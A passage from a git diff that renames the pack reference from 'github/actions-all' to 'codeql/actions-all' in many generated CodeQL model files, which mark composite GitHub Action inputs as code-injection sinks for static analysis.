b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mozilla/bedrock", "*", "input.", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml index 926230e2282..e64c87b9e07 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mozilla/sccache", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml index 0827f770e31..2d663b075be 100644 --- a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["msys2/setup-msys2", "*", "input.systems", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml index 9314532b426..95b63bfadd0 100644 --- a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml +++ b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mumble-voip/mumble", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml index 961ad291c0d..88da6f06637 100644 --- a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nasa/fprime", "*", "input.location", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml index d2a963c237e..841140aa12e 100644 --- a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nats-io/nats-server", "*", "input.label", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml index 809fde33877..04657e223ad 100644 --- a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nearform-actions/optic-release-automation-action", "*", "input.build-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml index 002a93c1249..7541c5b8dab 100644 --- a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml +++ b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nektos/act", "*", "input.test_input_optional", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml index 67404b9f311..2f4033d0825 100644 --- a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml +++ b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.project-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml index e4eb1d83db2..aeed286a882 100644 --- a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["neondatabase/neon", "*", "input.save_perf_report", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml index fc29f5fc8ff..4d980520bc3 100644 --- a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["neovim/neovim", "*", "input.install_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml index 352d2550b89..26517905433 100644 --- a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml +++ b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nhost/nhost", "*", "input.config", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml index 954216bb04e..af31a4267fd 100644 --- a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nix-community/nixos-wsl", "*", "input.filename", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml index dcb26733160..6317a72443c 100644 --- a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["novuhq/novu", "*", "input.tag", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["novuhq/novu", "*", "input.docker_name", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml index 4608da8fe61..3b2bcb74bb6 100644 --- a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml +++ b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["nymtech/nym", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml index e38ba9b4edf..320eabd533c 100644 --- a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml +++ b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["obsproject/obs-studio", "*", "input.failCondition", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml index 48a1bb5ca8b..3af9358c65e 100644 --- a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml +++ b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ocaml/dune", "*", "input.OCAML_COMPILER", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml index 744b025fa65..a61edccecf8 100644 --- a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["oneflow-inc/oneflow", "*", "input.extra_flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml index d6c91a3853c..2f7f8c15030 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.gem", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml index e49d896bce0..72601a40407 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby", "*", "input.gem", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml index 66240fb41c3..6808b4a2893 100644 --- a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["open-watcom/open-watcom-v2", "*", "input.fullname", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml index e9fbe3a2950..93c348e570a 100644 --- a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml +++ b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openapitools/openapi-generator", "*", "input.args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml index bd94706b140..31be17adf41 100644 --- a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openjdk/jdk", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml index 39324776e80..89f2daede97 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["opensearch-project/opensearch-net", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml index 80c781f72df..ce881a46225 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["opensearch-project/security", "*", "input.plugin-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml index abee0f74453..cd422d4278d 100644 --- a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml +++ b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["opentrons/opentrons", "*", "input.destPrefix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml index 9a20261be90..82d25587bf9 100644 --- a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_files_changed", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml index a8c9d3fabce..e6c66721c3f 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml index c222d5e1fd9..668e681473d 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts", "*", "input.layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml index 0a8427f29e4..13c965ae30a 100644 --- a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml +++ b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["oppia/oppia", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml index 52a2001db13..726aab85e84 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["oracle/graal", "*", "input.components", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml index 28d8cabc368..4325315c595 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["oracle/truffleruby", "*", "input.archive", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml index f3ef4917146..11da4a45708 100644 --- a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml +++ b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["orhun/git-cliff", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml index 6150422d177..4064d556702 100644 --- a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml +++ b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["oven-sh/bun", "*", "input.download-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml index ad99ed2b432..c8d29fbe9f9 100644 --- a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["owntracks/android", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml index 5df1a5f2230..5be8efeee39 100644 --- a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml +++ b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pandas-dev/pandas", "*", "input.meson_args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml index b2c5857a743..4b4e290a9cb 100644 --- a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pardeike/harmony", "*", "input.architecture", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml index 93996601c8a..6f56ef896d3 100644 --- a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pennylaneai/pennylane", "*", "input.requirements_file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml index c1d90d6ab0a..1520e1fa3b1 100644 --- a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml +++ b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["phalcon/cphalcon", "*", "input.target-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml index d29d4d5674d..2d0a5e4f6d6 100644 --- a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml +++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.framework", "code-injection", "generated"] - ["philosowaffle/peloton-to-garmin", "*", "input.os", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.os", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml index 0aaacca4805..c4224e60057 100644 --- a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml +++ b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["php/php-src", "*", "input.jitType", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml index b69a7740079..b452fb2ebd5 100644 --- a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml +++ b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["phpdocumentor/phpdocumentor", "*", "input.passphrase", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml index 6ab3f7d2bf5..e75842caa3f 100644 --- a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client", "*", "input.googleapis_common_protos_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml index f5ce35d96ad..53a35fdd9d9 100644 --- a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml +++ b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pixijs/pixijs", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml index 519adffb097..ca216f3b091 100644 --- a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml +++ b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["posthog/posthog", "*", "input.group", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/ql/lib/ext/generated/composite-actions/primer_react.model.yml index 69d0355d720..25107038af5 100644 --- a/ql/lib/ext/generated/composite-actions/primer_react.model.yml +++ b/ql/lib/ext/generated/composite-actions/primer_react.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["primer/react", "*", "input.token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml index 97a69439375..04132df42bf 100644 --- a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml +++ b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["project-chip/connectedhomeip", "*", "input.with", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml index 54e557061df..ca7d52c45a9 100644 --- a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml +++ b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["projectnessie/nessie", "*", "input.job-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/ql/lib/ext/generated/composite-actions/psf_black.model.yml index 12ed97f6af5..3e42add8650 100644 --- a/ql/lib/ext/generated/composite-actions/psf_black.model.yml +++ b/ql/lib/ext/generated/composite-actions/psf_black.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["psf/black", "*", "input.summary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml index 2c64a6978af..c0b4d00d5e5 100644 --- a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pyca/cryptography", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml index f7982d2244a..505790a2c9a 100644 --- a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pyg-team/pytorch/geometric", "*", "input.torchvision-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml index 9678f320425..ebb4ebff5e3 100644 --- a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml +++ b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["python-poetry/poetry", "*", "input.args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml index 2ee43fbcf6c..fcac2d1554d 100644 --- a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml +++ b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["python/mypy", "*", "input.install_project_dependencies", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml index 2560e80f52c..a4fc1bd993d 100644 --- a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli", "*", "input.keychain-pw", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml index 17e4f893d39..6831b4406bc 100644 --- a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml +++ b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["quay/clair", "*", "input.tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml 